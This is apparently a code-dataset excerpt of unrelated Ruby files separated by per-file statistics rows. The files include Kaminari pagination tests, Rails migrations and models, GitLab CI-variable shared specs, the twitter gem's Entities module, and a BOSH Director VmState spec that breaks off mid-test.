assert_nil view.link_to_previous_page(users, 'Previous', params: {controller: 'users', action: 'index'})
assert_equal 'At the Beginning', (view.link_to_previous_page(users, 'Previous', params: {controller: 'users', action: 'index'}) do 'At the Beginning' end)
end
test '#link_to_previous_page accepts ActionController::Parameters' do
users = User.page(3)
params = ActionController::Parameters.new(controller: 'users', action: 'index', status: 'active')
html = view.link_to_previous_page users, 'Previous', params: params
assert_match(/page=2/, html)
assert_match(/rel="prev"/, html)
assert_match(/status=active/, html)
end
end
sub_test_case '#link_to_next_page' do
setup do
50.times {|i| User.create! name: "user#{i}"}
end
sub_test_case 'having more page' do
test 'the default behaviour' do
users = User.page(1)
html = view.link_to_next_page users, 'More', params: {controller: 'users', action: 'index'}
assert_match(/page=2/, html)
assert_match(/rel="next"/, html)
end
test 'overriding rel=' do
users = User.page(1)
assert_match(/rel="external"/, view.link_to_next_page(users, 'More', rel: 'external', params: {controller: 'users', action: 'index'}))
end
test 'with params' do
users = User.page(1)
params[:status] = 'active'
assert_match(/status=active/, view.link_to_next_page(users, 'More', params: {controller: 'users', action: 'index'}))
end
end
test 'the last page' do
users = User.page(2)
assert_nil view.link_to_next_page(users, 'More', params: {controller: 'users', action: 'index'})
end
test 'out of range' do
users = User.page(5)
assert_nil view.link_to_next_page(users, 'More', params: {controller: 'users', action: 'index'})
end
test '#link_to_next_page accepts ActionController::Parameters' do
users = User.page(1)
params = ActionController::Parameters.new(controller: 'users', action: 'index', status: 'active')
html = view.link_to_next_page users, 'More', params: params
assert_match(/page=2/, html)
assert_match(/rel="next"/, html)
assert_match(/status=active/, html)
end
end
sub_test_case '#page_entries_info' do
sub_test_case 'on a model without namespace' do
sub_test_case 'having no entries' do
test 'with default entry name' do
users = User.page(1).per(25)
assert_equal 'No users found', view.page_entries_info(users)
end
test 'setting the entry name option to "member"' do
users = User.page(1).per(25)
assert_equal 'No members found', view.page_entries_info(users, entry_name: 'member')
end
end
sub_test_case 'having 1 entry' do
setup do
User.create! name: 'user1'
end
test 'with default entry name' do
users = User.page(1).per(25)
assert_equal 'Displaying <b>1</b> user', view.page_entries_info(users)
end
test 'setting the entry name option to "member"' do
users = User.page(1).per(25)
assert_equal 'Displaying <b>1</b> member', view.page_entries_info(users, entry_name: 'member')
end
end
sub_test_case 'having more than 1 but less than a page of entries' do
setup do
10.times {|i| User.create! name: "user#{i}"}
end
test 'with default entry name' do
users = User.page(1).per(25)
assert_equal 'Displaying <b>all 10</b> users', view.page_entries_info(users)
end
test 'setting the entry name option to "member"' do
users = User.page(1).per(25)
assert_equal 'Displaying <b>all 10</b> members', view.page_entries_info(users, entry_name: 'member')
end
end
sub_test_case 'having more than one page of entries' do
setup do
50.times {|i| User.create! name: "user#{i}"}
end
sub_test_case 'the first page' do
test 'with default entry name' do
users = User.page(1).per(25)
assert_equal 'Displaying users <b>1 - 25</b> of <b>50</b> in total', view.page_entries_info(users)
end
test 'setting the entry name option to "member"' do
users = User.page(1).per(25)
assert_equal 'Displaying members <b>1 - 25</b> of <b>50</b> in total', view.page_entries_info(users, entry_name: 'member')
end
end
sub_test_case 'the next page' do
test 'with default entry name' do
users = User.page(2).per(25)
assert_equal 'Displaying users <b>26 - 50</b> of <b>50</b> in total', view.page_entries_info(users)
end
test 'setting the entry name option to "member"' do
users = User.page(2).per(25)
assert_equal 'Displaying members <b>26 - 50</b> of <b>50</b> in total', view.page_entries_info(users, entry_name: 'member')
end
end
sub_test_case 'the last page' do
test 'with default entry name' do
begin
User.max_pages 4
users = User.page(4).per(10)
assert_equal 'Displaying users <b>31 - 40</b> of <b>50</b> in total', view.page_entries_info(users)
ensure
User.max_pages nil
end
end
end
test 'it accepts a decorated object' do
page_info_presenter = Class.new(SimpleDelegator) do
include ActionView::Helpers::NumberHelper
def total_count
number_with_delimiter(1_000)
end
end
users = page_info_presenter.new(User.page(1).per(25))
assert_equal 'Displaying users <b>1 - 25</b> of <b>1,000</b> in total', view.page_entries_info(users)
end
end
end
sub_test_case 'I18n' do
setup do
50.times {|i| User.create! name: "user#{i}"}
end
test 'page_entries_info translates entry' do
users = User.page(1).per(25)
begin
I18n.backend.store_translations(:en, User.i18n_scope => { models: { user: { one: "person", other: "people" } } })
assert_equal 'Displaying people <b>1 - 25</b> of <b>50</b> in total', view.page_entries_info(users)
ensure
I18n.backend.reload!
end
end
sub_test_case 'with any other locale' do
teardown do
I18n.backend.reload!
end
sub_test_case ':de' do
setup do
I18n.locale = :de
I18n.backend.store_translations(:de,
helpers: {
page_entries_info: {
one_page: {
display_entries: {
one: "Displaying <b>1</b> %{entry_name}",
other: "Displaying <b>all %{count}</b> %{entry_name}"
}
},
more_pages: {
display_entries: "Displaying %{entry_name} <b>%{first} - %{last}</b> of <b>%{total}</b> in total"
}
}
}
)
end
test 'with default entry name' do
users = User.page(1).per(50)
assert_equal 'Displaying <b>all 50</b> Benutzer', view.page_entries_info(users, entry_name: 'Benutzer')
end
test 'the last page with default entry name' do
User.max_pages 4
users = User.page(4).per(10)
assert_equal 'Displaying Benutzer <b>31 - 40</b> of <b>50</b> in total', view.page_entries_info(users, entry_name: 'Benutzer')
end
end
end
sub_test_case ':fr' do
setup do
I18n.locale = :fr
ActiveSupport::Inflector.inflections(:fr) do |inflect|
inflect.plural(/$/, 's')
inflect.singular(/s$/, '')
end
I18n.backend.store_translations(:fr,
helpers: {
page_entries_info: {
one_page: {
display_entries: {
one: "Displaying <b>1</b> %{entry_name}",
other: "Displaying <b>all %{count}</b> %{entry_name}"
}
},
more_pages: {
display_entries: "Displaying %{entry_name} <b>%{first} - %{last}</b> of <b>%{total}</b> in total"
}
}
}
)
end
sub_test_case 'having 1 entry' do
setup do
User.delete_all
User.create! name: 'user1'
end
test 'with default entry name' do
users = User.page(1).per(25)
assert_equal 'Displaying <b>1</b> utilisateur', view.page_entries_info(users, entry_name: 'utilisateur')
end
end
test 'having multiple entries with default entry name' do
users = User.page(1).per(50)
assert_equal 'Displaying <b>all 50</b> utilisateurs', view.page_entries_info(users, entry_name: 'utilisateur')
end
test 'the last page with default entry name' do
User.max_pages 4
users = User.page(4).per(10)
assert_equal 'Displaying utilisateurs <b>31 - 40</b> of <b>50</b> in total', view.page_entries_info(users, entry_name: 'utilisateur')
end
end
end
sub_test_case 'on a model with namespace' do
teardown do
User::Address.delete_all
end
test 'having no entries' do
addresses = User::Address.page(1).per(25)
assert_equal 'No addresses found', view.page_entries_info(addresses)
end
sub_test_case 'having 1 entry' do
setup do
User::Address.create!
end
test 'with default entry name' do
addresses = User::Address.page(1).per(25)
assert_equal 'Displaying <b>1</b> address', view.page_entries_info(addresses)
end
test 'setting the entry name option to "place"' do
addresses = User::Address.page(1).per(25)
assert_equal 'Displaying <b>1</b> place', view.page_entries_info(addresses, entry_name: 'place')
end
end
sub_test_case 'having more than 1 but less than a page of entries' do
setup do
10.times { User::Address.create! }
end
test 'with default entry name' do
addresses = User::Address.page(1).per(25)
assert_equal 'Displaying <b>all 10</b> addresses', view.page_entries_info(addresses)
end
test 'setting the entry name option to "place"' do
addresses = User::Address.page(1).per(25)
assert_equal 'Displaying <b>all 10</b> places', view.page_entries_info(addresses, entry_name: 'place')
end
end
sub_test_case 'having more than one page of entries' do
setup do
50.times { User::Address.create! }
end
sub_test_case 'the first page' do
test 'with default entry name' do
addresses = User::Address.page(1).per(25)
assert_equal 'Displaying addresses <b>1 - 25</b> of <b>50</b> in total', view.page_entries_info(addresses)
end
test 'setting the entry name option to "place"' do
addresses = User::Address.page(1).per(25)
assert_equal 'Displaying places <b>1 - 25</b> of <b>50</b> in total', view.page_entries_info(addresses, entry_name: 'place')
end
end
sub_test_case 'the next page' do
test 'with default entry name' do
addresses = User::Address.page(2).per(25)
assert_equal 'Displaying addresses <b>26 - 50</b> of <b>50</b> in total', view.page_entries_info(addresses)
end
test 'setting the entry name option to "place"' do
addresses = User::Address.page(2).per(25)
assert_equal 'Displaying places <b>26 - 50</b> of <b>50</b> in total', view.page_entries_info(addresses, entry_name: 'place')
end
end
end
end
test 'on a PaginatableArray' do
numbers = Kaminari.paginate_array(%w{one two three}).page(1)
assert_equal 'Displaying <b>all 3</b> entries', view.page_entries_info(numbers)
end
end
sub_test_case '#rel_next_prev_link_tags' do
setup do
31.times {|i| User.create! name: "user#{i}"}
end
test 'the first page' do
users = User.page(1).per(10)
html = view.rel_next_prev_link_tags users, params: {controller: 'users', action: 'index'}
assert_not_match(/rel="prev"/, html)
assert_match(/rel="next"/, html)
assert_match(/\?page=2/, html)
end
test 'the second page' do
users = User.page(2).per(10)
html = view.rel_next_prev_link_tags users, params: {controller: 'users', action: 'index'}
assert_match(/rel="prev"/, html)
assert_not_match(/\?page=1/, html)
assert_match(/rel="next"/, html)
assert_match(/\?page=3/, html)
end
test 'the last page' do
users = User.page(4).per(10)
html = view.rel_next_prev_link_tags users, params: {controller: 'users', action: 'index'}
assert_match(/rel="prev"/, html)
assert_match(/\?page=3"/, html)
assert_not_match(/rel="next"/, html)
end
end
sub_test_case '#path_to_next_page' do
setup do
2.times {|i| User.create! name: "user#{i}"}
end
test 'the first page' do
users = User.page(1).per(1)
assert_equal '/users?page=2', view.path_to_next_page(users, params: {controller: 'users', action: 'index'})
end
test 'the last page' do
users = User.page(2).per(1)
assert_nil view.path_to_next_page(users, params: {controller: 'users', action: 'index'})
end
end
# Tests for Kaminari's #path_to_prev_page view helper: nil on the first
# page, a canonical path (no ?page param) for page 1, ?page=N otherwise.
sub_test_case '#path_to_prev_page' do
  setup do
    3.times {|i| User.create! name: "user#{i}"}
  end

  test 'the first page' do
    users = User.page(1).per(1)

    # Page 1 has no previous page.
    assert_nil view.path_to_prev_page(users, params: {controller: 'users', action: 'index'})
  end

  test 'the second page' do
    users = User.page(2).per(1)

    # The first page is canonicalized without a ?page parameter.
    assert_equal '/users', view.path_to_prev_page(users, params: {controller: 'users', action: 'index'})
  end

  test 'the last page' do
    users = User.page(3).per(1)

    # Style fix: space added between assert_equal and its argument.
    assert_equal '/users?page=2', view.path_to_prev_page(users, params: {controller: 'users', action: 'index'})
  end
end
sub_test_case '#next_page_url' do
setup do
2.times {|i| User.create! name: "user#{i}"}
end
test 'the first page' do
users = User.page(1).per(1)
assert_equal 'http://test.host/users?page=2', view.next_page_url(users, params: {controller: 'users', action: 'index'})
end
test 'the last page' do
users = User.page(2).per(1)
assert_nil view.next_page_url(users, params: {controller: 'users', action: 'index'})
end
end
# Tests for Kaminari's #prev_page_url view helper: same semantics as
# #path_to_prev_page but returning an absolute URL.
sub_test_case '#prev_page_url' do
  setup do
    3.times {|i| User.create! name: "user#{i}"}
  end

  test 'the first page' do
    users = User.page(1).per(1)

    # Page 1 has no previous page.
    assert_nil view.prev_page_url(users, params: {controller: 'users', action: 'index'})
  end

  test 'the second page' do
    users = User.page(2).per(1)

    # The first page is canonicalized without a ?page parameter.
    assert_equal 'http://test.host/users', view.prev_page_url(users, params: {controller: 'users', action: 'index'})
  end

  test 'the last page' do
    users = User.page(3).per(1)

    # Style fix: space added between assert_equal and its argument.
    assert_equal 'http://test.host/users?page=2', view.prev_page_url(users, params: {controller: 'users', action: 'index'})
  end
end
end
end
| 35.530405 | 162 | 0.574451 |
332ab37c7b826be854125f2f860d91713aa09e56 | 120 | class AddCarNumberToScans < ActiveRecord::Migration
# Adds an integer car_number column to scans.
# Reversible: Rails infers remove_column on rollback.
# NOTE(review): the enclosing class inherits from unversioned
# ActiveRecord::Migration, which Rails 5+ rejects — confirm the app's
# Rails version.
def change
  add_column :scans, :car_number, :integer
end
end
| 20 | 51 | 0.766667 |
e80722857ec86dc059bcda6ebdb646ac4dfd2be2 | 3,386 | shared_examples 'GET #show lists all variables' do
# Host spec must define `subject` (the GET request), `response` and
# `json_response`.
it 'renders the variables as json' do
  subject

  # Payload must conform to the 'variables' JSON schema fixture.
  expect(response).to match_response_schema('variables')
end

it 'has only one variable' do
  subject

  expect(json_response['variables'].count).to eq(1)
end
end
# Shared examples for controllers that bulk-update CI variables through
# nested `variables_attributes` params. The host spec must define
# `subject` (the PATCH request), `owner` (a model with a `variables`
# association) and `variable` (a pre-existing variable on the owner).
shared_examples 'PATCH #update updates variables' do
  let(:variable_attributes) do
    { id: variable.id,
      key: variable.key,
      secret_value: variable.value,
      protected: variable.protected?.to_s }
  end
  let(:new_variable_attributes) do
    { key: 'new_key',
      secret_value: 'dummy_value',
      protected: 'false' }
  end

  context 'with invalid new variable parameters' do
    let(:variables_attributes) do
      [
        variable_attributes.merge(secret_value: 'other_value'),
        # '...?' is not a valid variable key, so the whole batch must be rejected
        new_variable_attributes.merge(key: '...?')
      ]
    end

    it 'does not update the existing variable' do
      expect { subject }.not_to change { variable.reload.value }
    end

    it 'does not create the new variable' do
      expect { subject }.not_to change { owner.variables.count }
    end

    it 'returns a bad request response' do
      subject

      expect(response).to have_gitlab_http_status(:bad_request)
    end
  end

  context 'with duplicate new variable parameters' do
    let(:variables_attributes) do
      [
        new_variable_attributes,
        # same key twice in one batch — the update must fail atomically
        new_variable_attributes.merge(secret_value: 'other_value')
      ]
    end

    it 'does not update the existing variable' do
      expect { subject }.not_to change { variable.reload.value }
    end

    it 'does not create the new variable' do
      expect { subject }.not_to change { owner.variables.count }
    end

    it 'returns a bad request response' do
      subject

      expect(response).to have_gitlab_http_status(:bad_request)
    end
  end

  context 'with valid new variable parameters' do
    let(:variables_attributes) do
      [
        variable_attributes.merge(secret_value: 'other_value'),
        new_variable_attributes
      ]
    end

    it 'updates the existing variable' do
      expect { subject }.to change { variable.reload.value }.to('other_value')
    end

    it 'creates the new variable' do
      expect { subject }.to change { owner.variables.count }.by(1)
    end

    it 'returns a successful response' do
      subject

      expect(response).to have_gitlab_http_status(:ok)
    end

    it 'has all variables in response' do
      subject

      expect(response).to match_response_schema('variables')
    end
  end

  context 'with a deleted variable' do
    # _destroy marks the nested record for destruction
    let(:variables_attributes) { [variable_attributes.merge(_destroy: 'true')] }

    it 'destroys the variable' do
      expect { subject }.to change { owner.variables.count }.by(-1)
      expect { variable.reload }.to raise_error ActiveRecord::RecordNotFound
    end

    it 'returns a successful response' do
      subject

      expect(response).to have_gitlab_http_status(:ok)
    end

    it 'has all variables in response' do
      subject

      expect(response).to match_response_schema('variables')
    end
  end

  context 'for variables of type file' do
    let(:variables_attributes) do
      [
        new_variable_attributes.merge(variable_type: 'file')
      ]
    end

    it 'creates new variable of type file' do
      expect { subject }.to change { owner.variables.file.count }.by(1)
    end
  end
end
| 24.897059 | 80 | 0.670112 |
6294c6f3561449e1a5b573ca942aa69bc51d7e68 | 2,321 | require 'memoizable'
require 'twitter/entity/hashtag'
require 'twitter/entity/symbol'
require 'twitter/entity/uri'
require 'twitter/entity/user_mention'
require 'twitter/media_factory'
module Twitter
  # Mixin that exposes a tweet/DM's entity collections (hashtags, media,
  # symbols, URIs, user mentions) as wrapped objects built from the raw
  # @attrs hash. All readers are memoized via the Memoizable gem.
  module Entities
    include Memoizable

    # Whether the object carries any non-empty entity collection.
    #
    # @return [Boolean]
    def entities?
      !@attrs[:entities].nil? && @attrs[:entities].any? { |_, array| array.any? }
    end
    memoize :entities?

    # @note Must include entities in your request for this method to work
    # @return [Array<Twitter::Entity::Hashtag>]
    def hashtags
      entities(Entity::Hashtag, :hashtags)
    end
    memoize :hashtags

    # @return [Boolean]
    def hashtags?
      hashtags.any?
    end
    memoize :hashtags?

    # @note Must include entities in your request for this method to work
    # @return [Array<Twitter::Media>]
    def media
      # Prefer :extended_entities (complete media list) and fall back to
      # the :entities payload when it is absent.
      extended_entities = entities(MediaFactory, :media, :extended_entities)
      extended_entities.empty? ? entities(MediaFactory, :media) : extended_entities
    end
    memoize :media

    # @return [Boolean]
    def media?
      media.any?
    end
    memoize :media?

    # @note Must include entities in your request for this method to work
    # @return [Array<Twitter::Entity::Symbol>]
    def symbols
      entities(Entity::Symbol, :symbols)
    end
    memoize :symbols

    # @return [Boolean]
    def symbols?
      symbols.any?
    end
    memoize :symbols?

    # @note Must include entities in your request for this method to work
    # @return [Array<Twitter::Entity::URI>]
    def uris
      entities(Entity::URI, :urls)
    end
    memoize :uris
    alias urls uris

    # @return [Boolean]
    def uris?
      uris.any?
    end
    # Memoized for consistency with the other predicates (hashtags?,
    # media?, symbols?, user_mentions?). Must run before the alias so
    # urls? also picks up the memoized implementation.
    memoize :uris?
    alias urls? uris?

    # @note Must include entities in your request for this method to work
    # @return [Array<Twitter::Entity::UserMention>]
    def user_mentions
      entities(Entity::UserMention, :user_mentions)
    end
    memoize :user_mentions

    # @return [Boolean]
    def user_mentions?
      user_mentions.any?
    end
    memoize :user_mentions?

  private

    # Builds entity wrappers of +klass+ from the raw attributes hash.
    #
    # @param klass [Class] wrapper class (or factory) for each raw entity hash
    # @param key2 [Symbol] entity collection key (e.g. :hashtags, :urls)
    # @param key1 [Symbol] top-level attrs key (:entities or :extended_entities)
    # @return [Array] wrapped entities (empty when the keys are missing)
    def entities(klass, key2, key1 = :entities)
      @attrs.fetch(key1.to_sym, {}).fetch(key2.to_sym, []).collect do |entity|
        klass.new(entity)
      end
    end
  end
end
| 23.927835 | 83 | 0.651874 |
b995568da43f0a0ce7ef271aaf7579b7a8515461 | 283 | # Encoding: utf-8
require_relative 'spec_helper'
describe 'logstash::default' do
  # Stubs shared Chef resources/data; defined in spec_helper.
  before { logstash_stubs }

  describe 'ubuntu' do
    let(:chef_run) { ChefSpec::Runner.new.converge(described_recipe) }

    # Placeholder example, intentionally pending until real assertions exist.
    it 'writes some chefspec code' do
      pending 'todo'
    end
  end
end
| 18.866667 | 70 | 0.699647 |
08d8b67504772a4e0b4397994afa3d8d163ce850 | 449 | class Myaccount::OrdersController < Myaccount::BaseController
# GET /myaccount/orders
# GET /myaccount/orders.xml
def index
  # Only completed orders are listed in the account area.
  @orders = current_user.completed_orders.find_myaccount_details
end

# GET /myaccount/orders/1
# GET /myaccount/orders/1.xml
def show
  # Looks the order up by its public number (params[:id] is the order
  # number, not the primary key) and eager-loads invoices for the view.
  @order = current_user.completed_orders.includes([:invoices]).find_by_number(params[:id])
end

private

# Tells the layout which my-account navigation tab to highlight.
def selected_myaccount_tab(tab)
  tab == 'orders'
end
end
| 23.631579 | 92 | 0.737194 |
ffa68a66cbdcb7aa81416cb794e9fb08882104a9 | 537 | class User < ActiveRecord::Base
# Roles available for authorization, stored as an integer-backed enum
# (0 => :user, 1 => :admin).
enum role: [:user, :admin]

# Every new record gets the default :user role.
after_initialize :set_default_role, if: :new_record?

def set_default_role
  self.role ||= :user
end

# Include default devise modules. Others available are:
# :lockable, :timeoutable and :omniauthable
devise :database_authenticatable, :registerable,
       :recoverable, :rememberable, :trackable, :validatable, :confirmable

# Associations
has_many :userobjects
has_many :things, through: :userobjects
end
| 28.263158 | 76 | 0.743017 |
26a97e1a923125667339a91fbf93d8f91c6d50fb | 176 | class AddSocialLinksToRecruitDocuments < ActiveRecord::Migration[6.0]
# Adds a jsonb social_links column to recruit_documents, NOT NULL and
# defaulting to an empty array. Reversible via the change method.
def change
  add_column :recruit_documents, :social_links, :jsonb, null: false, default: []
end
end
| 29.333333 | 82 | 0.767045 |
871e0ae0c9beaa047b09f77d2428e4309de44c20 | 136 | class AddCommentsCountToProposals < ActiveRecord::Migration
  # Adds a counter column tracking the number of comments on a proposal
  # (presumably maintained as a Rails counter cache — confirm against the
  # Comment model's belongs_to declaration).
  def change
    add_column :proposals, :comments_count, :integer
  end
end
| 22.666667 | 59 | 0.794118 |
336f4d459ad4fe53823022f3cead997d4780bdd7 | 20,167 | require File.expand_path('../../../spec_helper', __FILE__)
module Bosh::Director
describe Jobs::VmState do
def stub_agent_get_state_to_return_state_with_vitals
expect(agent).to receive(:get_state).with('full').and_return(
'vm_cid' => 'fake-vm-cid',
'networks' => { 'test' => { 'ip' => '1.1.1.1' } },
'agent_id' => 'fake-agent-id',
'job_state' => 'running',
'processes' => [
{ 'name' => 'fake-process-1', 'state' => 'running' },
{ 'name' => 'fake-process-2', 'state' => 'failing' },
],
'cloud_properties' => {},
'vitals' => {
'load' => %w[1 5 15],
'cpu' => { 'user' => 'u', 'sys' => 's', 'wait' => 'w' },
'mem' => { 'percent' => 'p', 'kb' => 'k' },
'swap' => { 'percent' => 'p', 'kb' => 'k' },
'disk' => { 'system' => { 'percent' => 'p' }, 'ephemeral' => { 'percent' => 'p' } },
},
)
end
subject(:job) { Jobs::VmState.new(deployment.id, 'full', instance_details) }
let(:instance_details) { false }
let(:deployment) { Models::Deployment.make }
let(:task) { Bosh::Director::Models::Task.make(id: 42, username: 'user') }
let(:time) { Time.now }
let(:vm) { Models::Vm.make(cid: 'fake-vm-cid', agent_id: 'fake-agent-id', instance_id: instance.id, created_at: time) }
let(:instance) { Models::Instance.make(deployment: deployment) }
before do
allow(Config).to receive(:dns).and_return('domain_name' => 'microbosh', 'db' => {})
allow(Config).to receive(:result).and_return(TaskDBWriter.new(:result_output, task.id))
end
describe 'DJ job class expectations' do
let(:job_type) { :vms }
let(:queue) { :urgent }
it_behaves_like 'a DJ job'
end
describe '#perform' do
before do
allow(AgentClient).to receive(:with_agent_id).with(anything, anything, timeout: 5).and_return(agent)
instance.active_vm = vm
instance.save
end
let(:agent) { instance_double('Bosh::Director::AgentClient') }
it 'parses agent info into vm_state WITHOUT vitals' do
Models::IpAddress.make(
instance_id: instance.id,
vm_id: vm.id,
address_str: NetAddr::CIDR.create('1.1.1.1').to_i.to_s,
task_id: '12345',
)
expect(agent).to receive(:get_state).with('full').and_return(
'vm_cid' => 'fake-vm-cid',
'networks' => { 'test' => { 'ip' => '1.1.1.1' } },
'agent_id' => 'fake-agent-id',
'job_state' => 'running',
)
job.perform
status = JSON.parse(Models::Task.first(id: task.id).result_output)
expect(status['ips']).to eq(['1.1.1.1'])
expect(status['dns']).to be_empty
expect(status['vm_cid']).to eq('fake-vm-cid')
expect(status['active']).to eq(true)
expect(status['agent_id']).to eq('fake-agent-id')
expect(status['job_state']).to eq('running')
expect(status['vitals']).to be_nil
expect(status['vm_created_at']).to eq(time.utc.iso8601)
end
context 'when there are two networks' do
before do
Models::IpAddress.make(
instance_id: instance.id,
vm_id: vm.id,
address_str: NetAddr::CIDR.create('1.1.1.1').to_i.to_s,
task_id: '12345',
)
Models::IpAddress.make(
instance_id: instance.id,
vm_id: vm.id,
address_str: NetAddr::CIDR.create('2.2.2.2').to_i.to_s,
task_id: '12345',
)
end
it "returns the ip addresses from 'Models::Instance.ip_addresses'" do
allow(agent).to receive(:get_state).with('full').and_raise(Bosh::Director::RpcTimeout)
job.perform
status = JSON.parse(Models::Task.first(id: task.id).result_output)
expect(status['ips']).to eq(['1.1.1.1', '2.2.2.2'])
end
end
context "when 'ip_addresses' is empty for instance" do
before do
vm.network_spec = { 'a' => { 'ip' => '3.3.3.3' }, 'b' => { 'ip' => '4.4.4.4' } }
vm.save
instance.spec = { 'networks' => { 'a' => { 'ip' => '1.1.1.1' }, 'b' => { 'ip' => '2.2.2.2' } } }
instance.save
end
it "returns the ip addresses from 'Models::Vm.network_spec'" do
allow(agent).to receive(:get_state).with('full').and_raise(Bosh::Director::RpcTimeout)
job.perform
status = JSON.parse(Models::Task.first(id: task.id).result_output)
expect(status['ips']).to eq(['3.3.3.3', '4.4.4.4'])
end
end
context 'when there are manual ip addresses and networks' do
before do
Models::IpAddress.make(
instance_id: instance.id,
vm_id: vm.id,
address_str: NetAddr::CIDR.create('1.1.1.1').to_i.to_s,
task_id: '12345',
)
Models::IpAddress.make(
instance_id: instance.id,
vm_id: vm.id,
address_str: NetAddr::CIDR.create('2.2.2.2').to_i.to_s,
task_id: '12345',
)
vm.network_spec = {
'a' => { 'ip' => '3.3.3.3' },
'b' => { 'ip' => '4.4.4.4' },
}
vm.save
instance.spec = {
'networks' => {
'a' => { 'ip' => '1.1.1.1' },
'b' => { 'ip' => '2.2.2.2' },
},
}
instance.save
end
it 'returns the static and dynamic ip addresses' do
allow(agent).to receive(:get_state).with('full').and_raise(Bosh::Director::RpcTimeout)
job.perform
status = JSON.parse(Models::Task.first(id: task.id).result_output)
expect(status['ips']).to eq([
'1.1.1.1', '2.2.2.2', # Static
'3.3.3.3', '4.4.4.4', # Dynamic
])
end
end
it 'parses agent info into vm_state WITH vitals' do
Models::IpAddress.make(
instance_id: instance.id,
vm_id: vm.id,
address_str: NetAddr::CIDR.create('1.1.1.1').to_i.to_s,
task_id: '12345',
)
stub_agent_get_state_to_return_state_with_vitals
job.perform
status = JSON.parse(Models::Task.first(id: task.id).result_output)
expect(status['ips']).to eq(['1.1.1.1'])
expect(status['dns']).to be_empty
expect(status['vm_cid']).to eq('fake-vm-cid')
expect(status['active']).to eq(true)
expect(status['agent_id']).to eq('fake-agent-id')
expect(status['job_state']).to eq('running')
expect(status['vm_created_at']).to eq(time.utc.iso8601)
expect(status['vitals']['load']).to eq(%w[1 5 15])
expect(status['vitals']['cpu']).to eq('user' => 'u', 'sys' => 's', 'wait' => 'w')
expect(status['vitals']['mem']).to eq('percent' => 'p', 'kb' => 'k')
expect(status['vitals']['swap']).to eq('percent' => 'p', 'kb' => 'k')
expect(status['vitals']['disk']).to eq('system' => { 'percent' => 'p' }, 'ephemeral' => { 'percent' => 'p' })
end
it 'should return DNS A records if they exist' do
instance.update(dns_record_names: ['index.job.network.deployment.microbosh'])
stub_agent_get_state_to_return_state_with_vitals
job.perform
status = JSON.parse(Models::Task.first(id: task.id).result_output)
expect(status['dns']).to eq(['index.job.network.deployment.microbosh'])
end
it 'should return DNS A records ordered by instance id records first' do
instance.update(
dns_record_names: [
'0.job.network.deployment.microbosh',
'd824057d-c92f-45a9-ad9f-87da12008b21.job.network.deployment.microbosh',
],
)
stub_agent_get_state_to_return_state_with_vitals
job.perform
status = JSON.parse(Models::Task.first(id: task.id).result_output)
expect(status['dns']).to eq(
['d824057d-c92f-45a9-ad9f-87da12008b21.job.network.deployment.microbosh', '0.job.network.deployment.microbosh'],
)
end
[RpcTimeout, RpcRemoteException].each do |error|
context "when get_state raises an #{error}" do
it 'should handle unresponsive agents' do
instance.update(job: 'dea', index: 50)
expect(agent).to receive(:get_state).with('full').and_raise(error)
job.perform
status = JSON.parse(Models::Task.first(id: task.id).result_output)
expect(status['vm_cid']).to eq('fake-vm-cid')
expect(status['active']).to eq(true)
expect(status['vm_created_at']).to eq(time.utc.iso8601)
expect(status['agent_id']).to eq('fake-agent-id')
expect(status['job_state']).to eq('unresponsive agent')
expect(status['job_name']).to eq('dea')
expect(status['index']).to eq(50)
end
end
end
it 'should get the default ignore status of a vm' do
instance
stub_agent_get_state_to_return_state_with_vitals
job.perform
status = JSON.parse(Models::Task.first(id: task.id).result_output)
expect(status['ignore']).to be(false)
end
it 'should get the ignore status of a vm when updated' do
instance.update(ignore: true)
stub_agent_get_state_to_return_state_with_vitals
job.perform
status = JSON.parse(Models::Task.first(id: task.id).result_output)
expect(status['ignore']).to be(true)
end
it 'should return disk cid(s) info when active disks found' do
Models::PersistentDisk.create(
instance: instance,
active: true,
disk_cid: 'fake-disk-cid',
)
stub_agent_get_state_to_return_state_with_vitals
job.perform
status = JSON.parse(Models::Task.first(id: task.id).result_output)
expect(status['vm_cid']).to eq('fake-vm-cid')
expect(status['active']).to eq(true)
expect(status['disk_cid']).to eq('fake-disk-cid')
expect(status['disk_cids']).to contain_exactly('fake-disk-cid')
end
it 'should return disk cid(s) info when many active disks found' do
Models::PersistentDisk.create(
instance: instance,
active: true,
disk_cid: 'fake-disk-cid',
)
Models::PersistentDisk.create(
instance: instance,
active: true,
disk_cid: 'fake-disk-cid2',
)
stub_agent_get_state_to_return_state_with_vitals
job.perform
status = JSON.parse(Models::Task.first(id: task.id).result_output)
expect(status['vm_cid']).to eq('fake-vm-cid')
expect(status['active']).to eq(true)
expect(status['disk_cid']).to eq('fake-disk-cid')
expect(status['disk_cids']).to contain_exactly('fake-disk-cid', 'fake-disk-cid2')
end
it 'should return disk cid(s) info when NO active disks found' do
Models::PersistentDisk.create(
instance: instance,
active: false,
disk_cid: 'fake-disk-cid',
)
stub_agent_get_state_to_return_state_with_vitals
job.perform
status = JSON.parse(Models::Task.first(id: task.id).result_output)
expect(status['vm_cid']).to eq('fake-vm-cid')
expect(status['active']).to eq(true)
expect(status['disk_cid']).to be_nil
expect(status['disk_cids']).to be_empty
end
it 'should return instance id' do
instance.update(uuid: 'blarg')
stub_agent_get_state_to_return_state_with_vitals
job.perform
status = JSON.parse(Models::Task.first(id: task.id).result_output)
expect(status['id']).to eq('blarg')
end
it 'should return vm_type' do
instance.update(spec: { 'vm_type' => { 'name' => 'fake-vm-type', 'cloud_properties' => {} }, 'networks' => [] })
stub_agent_get_state_to_return_state_with_vitals
job.perform
status = JSON.parse(Models::Task.first(id: task.id).result_output)
expect(status['vm_type']).to eq('fake-vm-type')
end
it 'should return processes info' do
instance # trigger the let
stub_agent_get_state_to_return_state_with_vitals
job.perform
status = JSON.parse(Models::Task.first(id: task.id).result_output)
expect(status['processes']).to eq([{ 'name' => 'fake-process-1', 'state' => 'running' },
{ 'name' => 'fake-process-2', 'state' => 'failing' }])
end
context 'when including instances missing vms' do
let(:instance_details) { true }
it 'does not try to contact the agent' do
instance.active_vm = nil
expect(AgentClient).to_not receive(:with_agent_id)
job.perform
status = JSON.parse(Models::Task.first(id: task.id).result_output)
expect(status['job_state']).to eq(nil)
end
end
context 'when instance is a bootstrap node' do
it 'should return bootstrap as true' do
instance.update(bootstrap: true)
stub_agent_get_state_to_return_state_with_vitals
job.perform
status = JSON.parse(Models::Task.first(id: task.id).result_output)
expect(status['bootstrap']).to be_truthy
end
end
context 'when instance is NOT a bootstrap node' do
it 'should return bootstrap as false' do
instance.update(bootstrap: false)
stub_agent_get_state_to_return_state_with_vitals
job.perform
